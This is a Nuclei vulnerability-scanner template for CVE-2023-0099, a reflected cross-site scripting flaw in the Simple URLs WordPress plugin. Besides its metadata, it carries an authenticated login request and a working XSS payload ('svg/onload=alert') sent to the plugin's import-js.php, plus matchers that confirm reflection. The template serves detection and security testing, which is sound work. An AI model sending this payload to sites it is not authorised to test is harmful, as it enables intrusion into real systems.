nuclei-templates/http/cves/2023/CVE-2023-0099.yaml

51 lines
2.0 KiB
YAML
Raw Normal View History

2023-04-21 08:56:01 +00:00
id: CVE-2023-0099
info:
name: Simple URLs < 115 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability can lead to session hijacking, defacement of websites, theft of sensitive information, and potential remote code execution.
2023-09-06 11:43:37 +00:00
remediation: Fixed in version 115
2023-04-21 08:56:01 +00:00
reference:
- https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8
- https://wordpress.org/plugins/simple-urls/
- https://nvd.nist.gov/vuln/detail/CVE-2023-0099
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2023-04-21 08:56:01 +00:00
cve-id: CVE-2023-0099
2023-07-11 19:49:27 +00:00
cwe-id: CWE-79
epss-score: 0.00078
epss-percentile: 0.32657
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:*
2023-04-21 08:56:01 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:43:37 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: getlasso
product: simple_urls
2023-09-06 11:43:37 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve,cve2023,xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,getlasso
2023-04-21 08:56:01 +00:00
http:
2023-04-21 08:56:01 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body, "</script><svg/onload=alert(document.domain)>")'
- 'contains(body_2, "search_term")'
condition: and
# digest: 490a0046304402203b4a80a87f3d0e0dd7e3f72258762bb37aba818f7dbe6ac5028735d7fafe84000220687feef5645a29a70482987b64ca91f982de7c388a6de07865be17b5785e2de7:922c64590222798bb761d5b6d8e72950